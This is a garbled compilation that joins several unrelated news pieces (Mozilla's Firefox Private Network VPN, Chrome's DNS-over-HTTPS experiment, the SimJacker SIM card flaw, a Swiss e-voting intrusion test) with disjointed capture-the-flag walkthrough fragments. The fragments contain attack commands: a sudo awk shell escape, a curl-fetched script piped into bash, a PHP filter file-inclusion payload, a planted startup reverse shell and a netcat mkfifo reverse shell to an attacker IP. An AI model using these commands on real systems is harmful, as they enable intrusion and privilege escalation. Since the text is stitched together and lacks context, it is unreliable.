Mozilla has officially launched a new privacy-focused VPN service, called Firefox Private Network, as a browser extension that aims to encrypt your online activity and limit what websites and advertisers know about you.

Firefox Private Network service is currently in beta and available only to desktop users in the United States as part of Mozilla's recently expunged "Firefox Test Pilot" program that lets users try out new experimental features before they were officially released.

The Firefox Test Pilot program was first launched by the company three years ago but was shut down in January this year. The company now decided to bring the program back but with some changes.

"The difference with the newly relaunched Test Pilot program is that these products and services may be outside the Firefox browser, and will be far more polished, and just one step shy of general public release," said Marissa Wood, vice president of product at Mozilla.

Firefox Private Network is the Test Pilot program's first new project.

Firefox Private Network — Mozilla's VPN Service

Like any other best VPN service, Firefox Private Network also masks your IP address from third-party online trackers and protect your sensitive information, like the website you visit and your financial information, when using public Wi-Fi.

Mozilla says its Firefox Private Network "provides a secure, encrypted path to the web to protect your connection and your personal information anywhere, and everywhere you use your Firefox browser."

Firefox Private Network also works the same way as any other VPN service.

The Firefox Private Network VPN service also encrypts and funnels every Internet browsing activity of yours through a collection of remote proxy servers, thereby masking your real location/identity and blocking third parties, including government and your ISP, from snooping on your connection.

The actual proxy servers for the Firefox Private Network extension is provided by Cloudflare, the company that offers one of the biggest and fastest CDN, DNS and DDoS protection services.

For those concerned about the data collection by Cloudflare, Mozilla promises "strong privacy controls" to limit what data Cloudflare may collect and for how long it may store that data.

"Cloudflare only observes a limited amount of data about the HTTP/HTTPS requests that are sent to the Cloudflare proxy via browsers with an active Mozilla extension," Cloudflare says.

"When requests are sent to the Cloudflare proxy, Cloudflare will observe your IP address, the IP address for the Internet property you are accessing, source port, destination port, timestamp and a token provided by Mozilla that indicates that you are a Firefox Private Network user (together, "Proxy Data"). All Proxy Data will be deleted within 24 hours."

How To Sign Up For Firefox VPN Service

Firefox Private Network currently works only on desktops but is believed to be made available for mobile users as well, once the VPN exits beta.

Although the Firefox Private Network service is currently free, Mozilla hinted that the company is exploring possible pricing options for the service in the future to keep it self-sustainable.

For now, if you have a Firefox account and reside in the United States, you can test the Firefox VPN service for free by signing up on the Firefox Private Network website.

Once installed on your desktop, the Firefox Private Network extension will add a toggle on the toolbar of your Firefox web browser so you can easily turn it on or off at any time.

Immediately after Mozilla announced its plan to soon enable 'DNS over HTTPS' (DoH) by default for Firefox users in the United States, Google today says it is planning an experiment with the privacy-focused technology in its upcoming Chrome 78.

Under development since 2017, 'DNS over HTTPS' performs DNS lookups—finding the server IP address of a certain domain name—over an encrypted HTTPS connection to a DNS server, rather than sending DNS queries in plaintext.

The protocol that sends DNS queries over secure HTTPS connections has specifically been designed to prevent miscreants from interfering with domain name lookups, eventually stopping network observers, including your ISPs and attackers, from figuring out what sites you visit.

Though the privacy-focused technology is also helpful in preventing attackers from redirecting unsuspecting visitors to phishing and malware sites, DNS over HTTPS could also bring its own new challenges to the enterprise security solutions by making it difficult to monitor network traffic for malicious activities.

For the same reason, two months ago, the UK Internet Services Providers' Association (ISPA) nominated Mozilla for "Internet villain of the year" award after the company added support for DoH protocol in its Firefox browser that breaks DNS-based content filters.

However, it should be noted that Firefox by default sets DoH server to Cloudflare and the setting needs to be changed manually, for which Mozilla has been criticized, whereas Google's implementation only upgrades to the equivalent DoH service from the same provider that a user is using.

Enabling 'DNS over HTTPS' in Chrome 78

In a blog post published today, Google said the company will add its implementation of 'DNS over HTTPS' to the upcoming Chrome 78, which is due for beta release in the next two weeks, and will enable the feature for a fraction of users as an early-experiment,

The experimental feature will automatically upgrade the DNS provider to the equivalent DoH service from the same provider if the user's current DNS provider is part of the list of known DoH-compatible providers. If not in the list, Chrome will continue to operate as it does today.

"In other words, this would upgrade the protocol used for DNS resolution while keeping the user's DNS provider unchanged. It's also important to note that DNS over HTTPS does not preclude its operator from offering features such as family-safe filtering," Google says.

Chrome 78 users who want to manually opt-in or opt-out of the experiment can change the flag settings at chrome://flags/#dns-over-https.

Chrome Compatible' DNS over HTTPS' Providers

Google says it has selected some DNS providers for "their strong stance on security and privacy, as well as the readiness of their DoH services" and their agreement to participate in the test. The list of providers currently include:

• Cleanbrowsing
• Cloudflare
• DNS.SB
• Google
• OpenDNS
• Quad9

The experiment will run on all platforms for Chrome 78 users except Linux and iOS, with the goals to validate the company's "implementation and to evaluate the performance impact."

On Android 9 and later, if users have set a DNS-over-TLS (DoT) provider in the private DNS settings, Chrome may attempt to utilize DoH instead, but if an error occurred, the browser would fall back to the DoT setting.

For those unaware, though DoH and DoT are separate standards for encrypting DNS queries, the concept of both is the same.

What're your thoughts on Google's experiment of implementing DoH? Let us know in the comment section below.

Cybersecurity researchers today revealed the existence of a new and previously undetected critical vulnerability in SIM cards that could allow remote attackers to compromise targeted mobile phones and spy on victims just by sending an SMS.

Dubbed "SimJacker," the vulnerability resides in a particular piece of software, called the S@T Browser (a dynamic SIM toolkit), embedded on most SIM cards that is widely being used by mobile operators in at least 30 countries and can be exploited regardless of which handsets victims are using.

What's worrisome? A specific private company that works with governments is actively exploiting the SimJacker vulnerability from at least the last two years to conduct targeted surveillance on mobile phone users across several countries.

S@T Browser, short for SIMalliance Toolbox Browser, is an application that comes installed on a variety of SIM cards, including eSIM, as part of SIM Tool Kit (STK) and has been designed to let mobile carriers provide some basic services, subscriptions, and value-added services over-the-air to their customers.

Since S@T Browser contains a series of STK instructions—such as send short message, setup call, launch browser, provide local data, run at command, and send data—that can be triggered just by sending an SMS to a device, the software offers an execution environment to run malicious commands on mobile phones as well.

How Does Simjacker Vulnerability Work?

Disclosed by researchers at AdaptiveMobile Security in new research published today, the vulnerability can be exploited using a $10 GSM modem to perform several tasks, listed below, on a targeted device just by sending an SMS containing a specific type of spyware-like code.

• Retrieving targeted device' location and IMEI information,
• Spreading mis-information by sending fake messages on behalf of victims,
• Performing premium-rate scams by dialing premium-rate numbers,
• Spying on victims' surroundings by instructing the device to call the attacker's phone number,
• Spreading malware by forcing victim's phone browser to open a malicious web page,
• Performing denial of service attacks by disabling the SIM card, and
• Retrieving other information like language, radio type, battery level, etc.

"During the attack, the user is completely unaware that they received the attack, that information was retrieved, and that it was successfully exfiltrated," researchers explain.

"The location information of thousands of devices was obtained over time without the knowledge or consent of the targeted mobile phone users. However the Simjacker attack can, and has been extended further to perform additional types of attacks."

"This attack is also unique, in that the Simjacker Attack Message could logically be classified as carrying a complete malware payload, specifically spyware. This is because it contains a list of instructions that the SIM card is to execute."

Though the technical details, detailed paper and proof-of-concept of the vulnerability are scheduled to be released publicly in October this year, the researchers said they had observed real-attacks against users with devices from nearly every manufacturer, including Apple, ZTE, Motorola, Samsung, Google, Huawei, and even IoT devices with SIM cards.

According to the researchers, all manufacturers and mobile phone models are vulnerable to the SimJacker attack as the vulnerability exploits a legacy technology embedded on SIM cards, whose specification has not been updated since 2009, potentially putting over a billion people at risk.

Simjacker Vulnerability Being Exploited in the Wild

 

The Swiss government is eager to ensure that its e-voting system is safe and secure for those casting their votes. To ensure that’s the case, they issued a press release looking for “Interested hackers from all over the world to attack the system.” This will be in the form of a public intrusion test or PIT session.

Public Intrusion Test

The public intrusion test (PIT) will run from February 25 until March 2 and offer cash rewards depending on what the hackers are able to do. There are a set of rules attached to this PIT, which set out the basics of the test, and the qualifying vulnerabilities.
The rewards for this test range from $100 to $30,000 based on CHF points (1 CHF point is roughly equivalent to 1 USD.)
There is set to be a mock e-voting session planned for the last day of testing on 24 March. However, hackers can attack the e-voting system before this date as well.

Registration

Anyone wanting to participate in the test has to register in advance of the PIT session. This gives the participants legal permission to attack the system and also enables them to receive rewards.
Registration also binds participants to the rules of the PIT. This ensures that only the system is targeted, and protects the rest of the Swiss Post infrastructure.

Rules

Participants of the PIT session are restricted from attacking certain areas of the infrastructure. For example, hackers are not allowed to harm a voter’s device or attack any unrelated systems belonging to Swiss Post who created the e-voting system.
However, Swiss Post will be disabling some of the e-voting security defences to allow participants to concentrate on the inner core of the system.
The Swiss government is holding public penetration tests to build confidence in the system. A committee of politicians and computer experts started an initiative at the end of January to have e-voting banned in Switzerland for at least five years. They are hoping to get over 100,000 signatures in a petition over the coming months.

sudo awk 'BEGIN {system("/bin/bash")}'

echo #!/bin/bash > script.sh
echo "sudo /bin/bash" > script.sh
python -m SimpleHTTPServer 1234

bash <(curl -s http://192.168.0.105:1234/script.sh)

sudo netdiscover -r 192.168.8.1/24

sudo nano /etc/hosts

. 

nmap -A -p- wakanda.local

A web server is running on port 80 and SSH on port 3333.
That’s the landing page of the server. When I checked “robots.txt”, it doesn’t exist. Now, let’s run dirbuster to find hidden files and directories.
There’s a comment out link “?lang=fr”, try this in URL.

http://wakanda.local/?lang=php://filter/convert.base64-encode/resource=index

We received some encoded response. Now, decode it using Burp’s decoder.
There is a password, we can try this over SSH. The username was gleaned from the index page footer which is “mamadou”.
We are logged in successfully, but there’s another twist. SSH has bound Python instead of BASH, so you have to use Python to talk to BASH. You can use “subprocess” or “pty” to talk to the Shell.

import pty
pty.spawn('/bin/bash')

Now, we’ve got a lower shell which is not “sudoer”. We have to strive harder to get higher privileges. Now we will check to see if there is a hint somewhere.

cat /etc/passwd

There’s an interesting user “devops”, they are also a “sudoer”. After some more searching, we found a file “/.antivirus.py” which is owned by “devops” and is writable.
When we check services, “./antivirus.py” runs at startup with “devops” privileges.
Now, we can rewrite this file with a reverse shell from PentestMonkey so when we restart the machine, we get a reverse shell with “devops” privileges.
Restart the machine. Our reverse shell code will run at startup and we’ve escalated our privileges.
We’ve got our second flag. Now, checking permissions,

python -m SimpleHTTPServer 4444

Now download it from attacker’s machine to “devops shell”.

Want to learn more about ethical hacking?

sudo netdiscover -i wlan0 -r 192.168.0.1/24

sudo nano /etc/hosts

The source code of the default webpage reveals nothing, let’s check “robots.txt”.

nc -v bl.local 9072

nc -nlvp 1234

.exec `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.101 1234 >/tmp/f`

We got our reverse shell executed.